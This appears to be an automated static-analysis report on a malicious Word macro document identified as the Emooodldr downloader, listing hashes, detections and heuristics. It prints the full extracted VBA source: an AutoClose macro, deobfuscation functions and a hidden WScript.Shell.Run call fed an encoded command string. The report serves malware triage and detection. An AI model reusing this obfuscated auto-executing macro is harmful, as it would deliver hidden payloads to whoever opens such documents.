Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 b2b0fe8835f5cb0a…

MALICIOUS

Office (OOXML)

Size: 36.7 KB
Created: 2017-05-22 22:37:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-04-18
MD5: 9ce80da250a8eddd660d36a050c71b82
SHA-1: 92d149b1776c35ddd8255b075e3a74b9ceb7c117
SHA-256: b2b0fe8835f5cb0a941b876b48d7fda262b85b6fec15436e48fdd2003ed914d4
Risk score: 292

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros. The AutoClose macro is present and uses WScript.Shell to execute a command. The `medesimo` and `cappero` functions appear to deobfuscate a string which is then passed to `rosolare`, which in turn calls `WScript.Shell.Run`. This indicates the document is designed to download and execute a secondary payload.

Heuristics 8

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(sfarzoso) > 16 Then
        Call CreateObject("WScript.Shell").Run(sfarzoso, vbHide)
      End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(sfarzoso) > 16 Then
        Call CreateObject("WScript.Shell").Run(sfarzoso, vbHide)
      End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
     Call Application.Run("rosolare", cappero("1206483001361130464652143406133908215214133930055207041226363652145106000026253552283430481420433830052152320436213000293430212950304351460830252133293106482546062635410846302822112121123749491748062417483008384439053617483639052905060049400949082126461515152912040522195254302503375342423153405352165222230546451800002930393022334752322126012114420106053036365254302503375342423153405322230546451800002930393022475228343048142043383005215232043621300029343 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2646 bytes
SHA-256: 05734534bd9d72672a6bba8cb1b306600ba1751f90df7b243f34039a42fc61b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function medesimo(sbalzo As Integer) As String
 Dim narciso() As Variant
 narciso = Array("m", "r", "=", "v", "y", "c", "o", "B", "i", "Z", "?", "h", "p", "E", "-", "u", "+", "q", "U", ",", "O", "t", "'", "\", "k", "n", "a", "g", "(", ".", "e", "D", "S", ")", "N", "d", "s", ":", "j", "x", "T", "F", "P", "b", "z", "R", "l", ";", "w", "/", "W", "C", " ", "A", "$")
 Dim tremolio As Integer
 
 For tremolio = LBound(narciso) To UBound(narciso)
   If tremolio = sbalzo Then
    medesimo = narciso(tremolio)
   End If
 Next
 
End Function

Function cappero(Optional chimera As String, Optional chimera2)
  pratica = orzo(Trim(chimera))
  verifica = ""

  For tremolio = 0 To Len(chimera)
    Dim sultano As String
    Dim certo As Integer
    If (tremolio + 1) <= UBound(pratica) Then
    asola = medesimo(Int(pratica(tremolio) + pratica(tremolio + 1)))
    verifica = inarcare(verifica, asola)
    tremolio = tremolio + 1
    End If
  Next
  
  cappero = verifica
End Function


Public Function rosolare(sfarzoso As String)
  If Len(sfarzoso) > 16 Then
    Call CreateObject("WScript.Shell").Run(sfarzoso, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("rosolare", cappero("12064830013611304646521434061339082152141339300552070412263636521451060000262535522834304814204338300521523204362130002934302129503043514608302521332931064825460626354108463028221121211237494917480624174830083844390536174836390529050600494009490821264615151529120405221952543025033753424231534053521652222305464518000029303930223347523221260121144201060530363652543025033753424231534053222305464518000029303930224752283430481420433830052152320436213000293430212950304351460830252133293106482546062635322101082527282211212112374949174806241748300838443905361748363905290506004936291211121008350208212646151515223347"))
End Sub

Function inarcare(ByVal palazzina As String, ByVal alpaca As String)
 acido = ""
 
 conciso = Array(palazzina, alpaca)
 For acuto = 0 To UBound(conciso)
   acido = acido & "" & conciso(acuto)
 Next
 
 inarcare = acido
End Function



Function orzo(buca As String, Optional edera As Integer) As Variant
    orzo = Split(Left(StrConv(buca, vbUnicode), Len(StrConv(buca, vbUnicode)) - 1), vbNullChar)
End Function

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 3f3f434e7f9a25f509cdcdb62678c7a0b689158b2159953ca51445c963d7a165
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).